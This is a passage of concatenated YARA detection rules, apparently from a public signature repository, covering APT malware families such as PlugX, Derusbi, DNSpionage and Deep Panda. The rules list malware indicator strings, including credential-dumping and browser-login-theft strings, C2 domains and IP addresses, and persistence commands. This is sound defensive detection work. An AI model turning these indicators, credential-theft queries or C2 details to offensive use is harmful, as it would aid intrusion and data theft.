$s5 = "<supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"></supportedOS>" fullword ascii /* Goodware String - occured 65 times */
condition:
uint16(0) == 0x5a4d and filesize < 900KB and 2 of ($x*) and 2 of ($s*)
}
rule Codoso_PlugX_1 {
meta:
description = "Detects Codoso APT PlugX Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
date = "2016-01-30"
super_rule = 1
hash1 = "0b8cbc9b4761ab35acce2aa12ba2c0a283afd596b565705514fd802c8b1e144b"
hash2 = "448711bd3f689ceebb736d25253233ac244d48cb766834b8f974c2e9d4b462e8"
hash3 = "fd22547497ce52049083092429eeff0599d0b11fe61186e91c91e1f76b518fe2"
id = "af777818-5cff-5571-b5e9-0f5a4c8b08ff"
strings:
$s1 = "GETPASSWORD1" fullword ascii
$s2 = "NvSmartMax.dll" fullword ascii
$s3 = "LICENSEDLG" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 800KB and all of them
}
rule Codoso_PGV_PVID_3 {
meta:
description = "Detects Codoso APT PGV PVID Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
date = "2016-01-30"
super_rule = 1
hash1 = "126fbdcfed1dfb31865d4b18db2fb963f49df838bf66922fea0c37e06666aee1"
hash2 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
hash3 = "8a56b476d792983aea0199ee3226f0d04792b70a1c1f05f399cb6e4ce8a38761"
hash4 = "b2950f2e09f5356e985c38b284ea52175d21feee12e582d674c0da2233b1feb1"
hash5 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
hash6 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
id = "08003dba-1201-5f74-9edd-ea321bb26e99"
strings:
$x1 = "Copyright (C) Microsoft Corporation. All rights reserved.(C) 2012" fullword wide
condition:
$x1
}
rule Codoso_PGV_PVID_2 {
meta:
description = "Detects Codoso APT PGV PVID Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
date = "2016-01-30"
super_rule = 1
hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
hash2 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
hash3 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
id = "e4c00806-3092-5ec2-844f-b638c31fa6a5"
strings:
$s0 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost" fullword ascii
$s1 = "regsvr32.exe /s \"%s\"" fullword ascii
$s2 = "Help and Support" fullword ascii
$s3 = "netsvcs" fullword ascii
$s9 = "%SystemRoot%\\System32\\svchost.exe -k netsvcs" fullword ascii /* Goodware String - occured 4 times */
$s10 = "winlogon" fullword ascii /* Goodware String - occured 4 times */
$s11 = "System\\CurrentControlSet\\Services" fullword ascii /* Goodware String - occured 11 times */
condition:
uint16(0) == 0x5a4d and filesize < 907KB and all of them
}
rule Codoso_PGV_PVID_1 {
meta:
description = "Detects Codoso APT PGV PVID Malware"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
date = "2016-01-30"
super_rule = 1
hash1 = "41a936b0d1fd90dffb2f6d0bcaf4ad0536f93ca7591f7b75b0cd1af8804d0824"
hash2 = "58334eb7fed37e3104d8235d918aa5b7856f33ea52a74cf90a5ef5542a404ac3"
hash3 = "934b87ddceabb2063b5e5bc4f964628fe0c63b63bb2346b105ece19915384fc7"
hash4 = "ce91ea20aa2e6af79508dd0a40ab0981f463b4d2714de55e66d228c579578266"
hash5 = "e770a298ae819bba1c70d0c9a2e02e4680d3cdba22d558d21caaa74e3970adf1"
id = "9487773a-01d9-558e-8866-b8a8650996ba"
strings:
$x1 = "DRIVERS\\ipinip.sys" fullword wide
$s1 = "TsWorkSpaces.dll" fullword ascii
$s2 = "%SystemRoot%\\System32\\wiaservc.dll" fullword wide
$s3 = "/selfservice/microsites/search.php?%016I64d" fullword ascii
$s4 = "/solutions/company-size/smb/index.htm?%016I64d" fullword ascii
$s5 = "Microsoft Chart ActiveX Control" fullword wide
$s6 = "MSChartCtrl.ocx" fullword wide
$s7 = "{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}" fullword ascii
$s8 = "WUServiceMain" fullword ascii /* Goodware String - occured 2 times */
$s9 = "Cookie: pgv_pvid=" ascii
condition:
( uint16(0) == 0x5a4d and ( 1 of ($x*) or 3 of them ) ) or
5 of them
}

View file

@ -0,0 +1,27 @@
/*
Core Impact Agent known from RocketKitten and WoolenGoldfish APT
*/
rule CoreImpact_sysdll_exe {
meta:
description = "Detects a malware sysdll.exe from the Rocket Kitten APT"
author = "Florian Roth (Nextron Systems)"
score = 70
date = "27.12.2014"
modified = "2023-01-06"
hash = "f89a4d4ae5cca6d69a5256c96111e707"
id = "bac55c00-5d14-59ca-8597-f52b4577be0c"
strings:
$s0 = "d:\\nightly\\sandbox_avg10_vc9_SP1_2011\\source\\avg10\\avg9_all_vs90\\bin\\Rele" ascii
$s1 = "Mozilla/5.0" fullword ascii
$s3 = "index.php?c=%s&r=%lx" fullword ascii
$s4 = "index.php?c=%s&r=%x" fullword ascii
$s5 = "127.0.0.1" fullword ascii
$s6 = "/info.dat" ascii
$s7 = "needroot" fullword ascii
$s8 = "./plugins/" ascii
condition:
$s0 or 6 of them
}

View file

@ -0,0 +1,77 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2016-05-25
Identifier: Kaspersky Report on threats involving CVE-2015-2545
*/
/* Rule Set ----------------------------------------------------------------- */
rule Mal_Dropper_httpEXE_from_CAB {
meta:
description = "Detects a dropper from a CAB file mentioned in the article"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/13Wgy1"
date = "2016-05-25"
score = 60
hash1 = "9e7e5f70c4b32a4d5e8c798c26671843e76bb4bd5967056a822e982ed36e047b"
id = "f67c13e9-67e7-56aa-8ced-55e9bb814971"
strings:
$s1 = "029.Hdl" fullword ascii
$s2 = "http.exe" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 1000KB and ( all of ($s*) ) )
}
rule Mal_http_EXE {
meta:
description = "Detects trojan from APT report named http.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/13Wgy1"
date = "2016-05-25"
modified = "2023-01-27"
score = 80
hash1 = "ad191d1d18841f0c5e48a5a1c9072709e2dd6359a6f6d427e0de59cfcd1d9666"
id = "bcae9920-56ea-54a1-857b-70c275090e19"
strings:
$x1 = "Content-Disposition: form-data; name=\"file1\"; filename=\"%s\"" fullword ascii
$x2 = "%ALLUSERSPROFILE%\\Accessories\\wordpade.exe" fullword ascii
$x3 = "\\dumps.dat" ascii
$x4 = "\\wordpade.exe" ascii
$x5 = "\\%s|%s|4|%d|%4d-%02d-%02d %02d:%02d:%02d|" ascii
$x6 = "\\%s|%s|5|%d|%4d-%02d-%02d %02d:%02d:%02d|" ascii
$x7 = "cKaNBh9fnmXgJcSBxx5nFS+8s7abcQ==" fullword ascii
$x8 = "cKaNBhFLn1nXMcCR0RlbMQ==" fullword ascii /* base64: pKY1[1 */
$s1 = "SELECT * FROM moz_logins;" fullword ascii
$s2 = "makescr.dat" fullword ascii
$s3 = "%s\\Mozilla\\Firefox\\profiles.ini" fullword ascii
$s4 = "?moz-proxy://" ascii
$s5 = "[%s-%s] Title: %s" fullword ascii
$s6 = "Cforeign key mismatch - \"%w\" referencing \"%w\"" fullword ascii
$s7 = "Windows 95 SR2" fullword ascii
$s8 = "\\|%s|0|0|" ascii
condition:
( uint16(0) == 0x5a4d and filesize < 2000KB and ( 1 of ($x*) and 2 of ($s*) ) ) or ( 3 of ($x*) )
}
rule Mal_PotPlayer_DLL {
meta:
description = "Detects a malicious PotPlayer.dll"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/13Wgy1"
date = "2016-05-25"
score = 70
hash1 = "705409bc11fb45fa3c4e2fa9dd35af7d4613e52a713d9c6ea6bc4baff49aa74a"
id = "71d34266-63e0-5a97-9a80-952be917641a"
strings:
$x1 = "C:\\Users\\john\\Desktop\\PotPlayer\\Release\\PotPlayer.pdb" fullword ascii
$s3 = "PotPlayer.dll" fullword ascii
$s4 = "\\update.dat" ascii
condition:
uint16(0) == 0x5a4d and filesize < 200KB and $x1 or all of ($s*)
}

View file

@ -0,0 +1,30 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2018-01-22
Identifier: Dark Caracal
Reference: https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news
*/
/* Rule Set ----------------------------------------------------------------- */
rule MiniRAT_Gen_1 {
meta:
description = "Detects Mini RAT malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news"
date = "2018-01-22"
hash1 = "091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b"
hash2 = "b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d"
hash3 = "ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2"
hash4 = "ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790"
hash5 = "675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd"
id = "65d89762-2fd0-5c6a-b706-92d77a03089a"
strings:
$x1 = "\\Mini rat\\" ascii
$x2 = "\\Projects\\ali\\Clever Components v7\\" ascii
condition:
uint16(0) == 0x5a4d and filesize < 7000KB and 1 of them
}

View file

@ -0,0 +1,91 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2018-07-28
Identifier: DarkHydrus
Reference: https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/
*/
/* Rule Set ----------------------------------------------------------------- */
import "pe"
rule APT_DarkHydrus_Jul18_1 {
meta:
description = "Detects strings found in malware samples in APT report in DarkHydrus"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
date = "2018-07-28"
hash1 = "99541ab28fc3328e25723607df4b0d9ea0a1af31b58e2da07eff9f15c4e6565c"
id = "fbd001c0-43c9-5429-84d6-7f62eadd8ff3"
strings:
$x1 = "Z:\\devcenter\\aggressor\\" ascii
condition:
uint16(0) == 0x5a4d and filesize < 600KB and (
pe.imphash() == "d3666d1cde4790b22b44ec35976687fb" or
1 of them
)
}
rule APT_DarkHydrus_Jul18_2 {
meta:
description = "Detects strings found in malware samples in APT report in DarkHydrus"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
date = "2018-07-28"
hash1 = "b2571e3b4afbce56da8faa726b726eb465f2e5e5ed74cf3b172b5dd80460ad81"
id = "1a21cbbf-f7e1-56eb-973b-35c1a811e210"
strings:
$s4 = "windir" fullword ascii /* Goodware String - occured 47 times */
$s6 = "temp.dll" fullword ascii /* Goodware String - occured 3 times */
$s7 = "libgcj-12.dll" fullword ascii /* Goodware String - occured 3 times */
$s8 = "%s\\System32\\%s" fullword ascii /* Goodware String - occured 4 times */
$s9 = "StartW" fullword ascii /* Goodware String - occured 5 times */
condition:
uint16(0) == 0x5a4d and filesize < 40KB and all of them
}
rule APT_DarkHydrus_Jul18_3 {
meta:
description = "Detects strings found in malware samples in APT report in DarkHydrus"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
date = "2018-07-28"
hash1 = "c8b3d4b6acce6b6655e17255ef7a214651b7fc4e43f9964df24556343393a1a3"
id = "1f766b49-3173-5f8a-ba52-a9ce9000be79"
strings:
$s2 = "Ws2_32.dll" fullword ascii
$s3 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 100KB and (
pe.imphash() == "478eacfbe2b201dabe63be53f34148a5" or
all of them
)
}
rule HKTL_Unlicensed_CobaltStrike_EICAR_Jul18_5 {
meta:
description = "Detects strings found in CobaltStrike shellcode"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
date = "2018-07-28"
modified = "2021-06-17"
hash1 = "cec36e8ed65ac6f250c05b4a17c09f58bb80c19b73169aaf40fa15c8d3a9a6a1"
id = "d52536b8-dd6b-59be-8761-d22b6a279114"
strings:
$x1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
$s1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" fullword ascii
$s2 = "libgcj-12.dll" fullword ascii /* Goodware String - occured 3 times */
condition:
uint16(0) == 0x5a4d and filesize < 900KB and (
pe.imphash() == "829da329ce140d873b4a8bde2cbfaa7e" or
all of ($s*) or
$x1
)
}

View file

@ -0,0 +1,90 @@
/* Deep Panda APT */
rule DeepPanda_sl_txt_packed {
meta:
description = "Hack Deep Panda - ScanLine sl-txt-packed"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
date = "2015/02/08"
hash = "ffb1d8ea3039d3d5eb7196d27f5450cac0ea4f34"
id = "7a335810-2bf9-5a0b-bef4-1bade65a0f00"
strings:
$s0 = "Command line port scanner" fullword wide
$s1 = "sl.exe" fullword wide
$s2 = "CPports.txt" fullword ascii
$s3 = ",GET / HTTP/.}" fullword ascii
$s4 = "Foundstone Inc." fullword wide
$s9 = " 2002 Foundstone Inc." fullword wide
$s15 = ", Inc. 2002" fullword ascii
$s20 = "ICMP Time" fullword ascii
condition:
all of them
}
rule DeepPanda_lot1 {
meta:
description = "Hack Deep Panda - lot1.tmp-pwdump"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
date = "2015/02/08"
hash = "5d201a0fb0f4a96cefc5f73effb61acff9c818e1"
id = "c72120a5-8637-580c-9856-e070dfb6df94"
strings:
$s0 = "Unable to open target process: %d, pid %d" fullword ascii
$s1 = "Couldn't delete target executable from remote machine: %d" fullword ascii
$s2 = "Target: Failed to load SAM functions." fullword ascii
$s5 = "Error writing the test file %s, skipping this share" fullword ascii
$s6 = "Failed to create service (%s/%s), error %d" fullword ascii
$s8 = "Service start failed: %d (%s/%s)" fullword ascii
$s12 = "PwDump.exe" fullword ascii
$s13 = "GetAvailableWriteableShare returned an error of %ld" fullword ascii
$s14 = ":\\\\.\\pipe\\%s" fullword ascii
$s15 = "Couldn't copy %s to destination %s. (Error %d)" fullword ascii
$s16 = "dump logon session" fullword ascii
$s17 = "Timed out waiting to get our pipe back" fullword ascii
$s19 = "SetNamedPipeHandleState failed, error %d" fullword ascii
$s20 = "%s\\%s.exe" fullword ascii
condition:
10 of them
}
rule DeepPanda_htran_exe {
meta:
description = "Hack Deep Panda - htran-exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
date = "2015/02/08"
hash = "38e21f0b87b3052b536408fdf59185f8b3d210b9"
id = "2a551e82-aff1-5a77-bc5e-d06e49dca8bc"
strings:
$s0 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
$s2 = "\\Release\\htran.pdb" ascii
$s3 = "[SERVER]connection to %s:%d error" fullword ascii
$s4 = "-tran <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
$s8 = "======================== htran V%s =======================" fullword ascii
$s11 = "-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
$s15 = "[+] OK! I Closed The Two Socket." fullword ascii
$s20 = "-listen <ConnectPort> <TransmitPort>" fullword ascii
condition:
1 of them
}
rule DeepPanda_Trojan_Kakfum {
meta:
description = "Hack Deep Panda - Trojan.Kakfum sqlsrv32.dll"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
date = "2015/02/08"
hash1 = "ab58b6aa7dcc25d8f6e4b70a24e0ccede0d5f6129df02a9e61293c1d7d7640a2"
hash2 = "c6c3bb72896f8f0b9a5351614fd94e889864cf924b40a318c79560bbbcfa372f"
id = "a204f9cb-65f8-53ea-a4eb-d89112942073"
strings:
$s0 = "%SystemRoot%\\System32\\svchost.exe -k sqlserver" fullword ascii
$s1 = "%s\\sqlsrv32.dll" fullword ascii
$s2 = "%s\\sqlsrv64.dll" fullword ascii
$s3 = "%s\\%d.tmp" fullword ascii
$s4 = "ServiceMaix" fullword ascii
$s15 = "sqlserver" fullword ascii
condition:
all of them
}

View file

@ -0,0 +1,143 @@
/*
Yara Rule Set
Author: Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud
Date: 2015-12-09
Reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family
Identifier: Derusbi Dez 2015
*/
rule derusbi_kernel
{
meta:
description = "Derusbi Driver version"
date = "2015-12-09"
author = "Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud"
id = "a60ab93a-e2be-53ee-a7da-56c763bc5533"
strings:
$token1 = "$$$--Hello"
$token2 = "Wrod--$$$"
$class = ".?AVPCC_BASEMOD@@"
condition:
uint16(0) == 0x5A4D and $token1 and $token2 and $class
}
rule derusbi_linux
{
meta:
description = "Derusbi Server Linux version"
date = "2015-12-09"
author = "Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud"
id = "2b33afb5-be87-5d41-b05e-b99d0c1d8ed9"
strings:
$PS1 = "PS1=RK# \\u@\\h:\\w \\$"
$cmd = "unset LS_OPTIONS;uname -a"
$pname = "[diskio]"
$rkfile = "/tmp/.secure"
$ELF = "\x7fELF"
condition:
$ELF at 0 and $PS1 and $cmd and $pname and $rkfile
}
/*
Yara Rule Set
Author: Florian Roth
Date: 2015-12-15
Identifier: Derusbi Dez 2015
*/
rule Derusbi_Kernel_Driver_WD_UDFS {
meta:
description = "Detects Derusbi Kernel Driver"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
date = "2015-12-15"
score = 80
hash1 = "1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016"
hash2 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a"
hash3 = "6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58"
hash4 = "e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59"
id = "51d80d19-f87f-5b09-ac49-08ebcb464013"
strings:
$x1 = "\\\\.\\pipe\\usbpcex%d" fullword wide
$x2 = "\\\\.\\pipe\\usbpcg%d" fullword wide
$x3 = "\\??\\pipe\\usbpcex%d" fullword wide
$x4 = "\\??\\pipe\\usbpcg%d" fullword wide
$x5 = "$$$--Hello" fullword ascii
$x6 = "Wrod--$$$" fullword ascii
$s1 = "\\Registry\\User\\%s\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" wide
$s2 = "Update.dll" fullword ascii
$s3 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WMI" wide
$s4 = "\\Driver\\nsiproxy" wide
$s5 = "HOST: %s" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 800KB and
(
2 of ($x*) or all of ($s*)
)
}
rule Derusbi_Code_Signing_Cert {
meta:
description = "Detects an executable signed with a certificate also used for Derusbi Trojan - suspicious"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
date = "2015-12-15"
score = 60
id = "d123fde9-0182-5232-a716-b76e8d9830c4"
strings:
$s1 = "Fuqing Dawu Technology Co.,Ltd.0" fullword ascii
$s2 = "XL Games Co.,Ltd.0" fullword ascii
$s3 = "Wemade Entertainment co.,Ltd0" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 800KB and 1 of them
}
rule XOR_4byte_Key {
meta:
description = "Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan)"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
date = "2015-12-15"
score = 60
id = "77850332-87ce-5ed3-bb09-88e91e5bb5f6"
strings:
/* Op Code */
$s1 = { 85 C9 74 0A 31 06 01 1E 83 C6 04 49 EB F2 }
/*
test ecx, ecx
jz short loc_590170
xor [esi], eax
add [esi], ebx
add esi, 4
dec ecx
jmp short loc_590162
*/
condition:
uint16(0) == 0x5a4d and filesize < 900KB and all of them
}
rule Derusbi_Backdoor_Mar17_1 {
meta:
description = "Detects a variant of the Derusbi backdoor"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "Internal Research"
date = "2017-03-03"
hash1 = "f87915f21dcc527981ebb6db3d332b5b341129b4af83524f59d7178e9d2a3a32"
id = "5c8838d6-b9c2-589e-b6a2-a8c7ad6f10cc"
strings:
$x1 = "%SystemRoot%\\System32\\wiaservc.dll" fullword wide
$x2 = "c%WINDIR%\\PCHealth\\HelpCtr\\Binaries\\pchsvc.dll" fullword wide
$x3 = "%Systemroot%\\Help\\perfc009.dat" fullword wide
$x4 = "rundll32.exe \"%s\", R32 %s" fullword wide
$x5 = "OfficeUt32.dll" fullword ascii
$x6 = "\\\\.\\pipe\\usb%so" fullword wide
$x7 = "\\\\.\\pipe\\usb%si" fullword wide
$x8 = "\\tmp1.dat" wide
condition:
( uint16(0) == 0x5a4d and filesize < 400KB and 1 of them )
}

View file

@ -0,0 +1,48 @@
rule MAL_DNSPIONAGE_Malware_Nov18 {
meta:
description = "Detects DNSpionage Malware"
author = "Florian Roth (Nextron Systems)"
reference = "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html"
date = "2018-11-30"
modified = "2023-01-06"
hash1 = "2010f38ef300be4349e7bc287e720b1ecec678cacbf0ea0556bcf765f6e073ec"
hash2 = "45a9edb24d4174592c69d9d37a534a518fbe2a88d3817fc0cc739e455883b8ff"
id = "5a0b498b-b2e9-5827-9908-63586b2cf947"
strings:
$x1 = ".0ffice36o.com" ascii
$s1 = "/Client/Login?id=" ascii
$s2 = ".\\Configure.txt" ascii
$s5 = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" fullword ascii
$s6 = "Content-Disposition: form-data; name=\"txts\"" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 1000KB and ( 1 of ($x*) or 2 of them )
}
rule APT_DNSpionage_Karkoff_Malware_Apr19_1 {
meta:
description = "Detects DNSpionage Karkoff malware"
author = "Florian Roth (Nextron Systems)"
reference = "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html"
date = "2019-04-24"
hash1 = "6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11"
hash2 = "b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04"
hash3 = "5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c"
hash4 = "cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5"
id = "be955760-ae94-5f77-928d-f4118a97ae6a"
strings:
$x1 = "Karkoff.exe" fullword wide
$x2 = "kuternull.com" fullword wide
$x3 = "rimrun.com" fullword wide
$s1 = "C:\\Windows\\Temp\\" wide
$s2 = "CMD.exe" fullword wide
$s3 = "get_ProcessExtensionDataNames" fullword ascii
$s4 = "get_ProcessDictionaryKeys" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 1000KB and (
1 of ($x*) or
all of ($s*)
)
}

View file

@ -0,0 +1,43 @@
import "pe"
rule APT_DonotTeam_YTYframework : APT DonotTeam Windows {
meta:
author = "James E.C, ProofPoint"
description = "Modular malware framework with similarities to EHDevel"
hashes = "1e0c1b97925e1ed90562d2c68971e038d8506b354dd6c1d2bcc252d2a48bc31c"
reference = "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/"
reference2 = "https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/"
date = "08-03-2018"
id = "6dd07019-aa5a-5966-8331-b6f6758b0652"
strings:
$x1 = "/football/download2/" ascii wide
$x2 = "/football/download/" ascii wide
$x3 = "Caption: Xp>" wide
$x_c2 = "5.135.199.0" ascii fullword
$a1 = "getGoogle" ascii fullword
$a2 = "/q /noretstart" wide
$a3 = "IsInSandbox" ascii fullword
$a4 = "syssystemnew" ascii fullword
$a5 = "ytyinfo" ascii fullword
$a6 = "\\ytyboth\\yty " ascii
$s1 = "SELECT Name FROM Win32_Processor" wide
$s2 = "SELECT Caption FROM Win32_OperatingSystem" wide
$s3 = "SELECT SerialNumber FROM Win32_DiskDrive" wide
$s4 = "VM: Yes" wide fullword
$s5 = "VM: No" wide fullword
$s6 = "helpdll.dll" ascii fullword
$s7 = "boothelp.exe" ascii fullword
$s8 = "SbieDll.dll" wide fullword
$s9 = "dbghelp.dll" wide fullword
$s10 = "YesNoMaybe" ascii fullword
$s11 = "saveData" ascii fullword
$s12 = "saveLogs" ascii fullword
condition:
uint16be(0) == 0x4d5a and filesize < 500KB and (
pe.imphash() == "87775285899fa860b9963b11596a2ded" or
1 of ($x*) or 3 of ($a*) or 6 of ($s*)
)
}

View file

@ -0,0 +1,109 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2017-09-12
Identifier: DragonFly
Reference: https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group
*/
/* Rule Set ----------------------------------------------------------------- */
import "pe"
rule Unspecified_Malware_Sep1_A1 {
meta:
description = "Detects malware from DrqgonFly APT report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
date = "2017-09-12"
hash1 = "28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0"
id = "cff49e85-c8c3-5240-9948-0551e38e7040"
condition:
( uint16(0) == 0x5a4d and
filesize < 200KB and
pe.imphash() == "17a4bd9c95f2898add97f309fc6f9bcd"
)
}
rule DragonFly_APT_Sep17_1 {
meta:
description = "Detects malware from DrqgonFly APT report"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
date = "2017-09-12"
hash1 = "fc54d8afd2ce5cb6cc53c46783bf91d0dd19de604308d536827320826bc36ed9"
id = "d219a54e-cb76-5c56-b64c-5019e811eeb1"
strings:
$s1 = "\\Update\\Temp\\ufiles.txt" wide
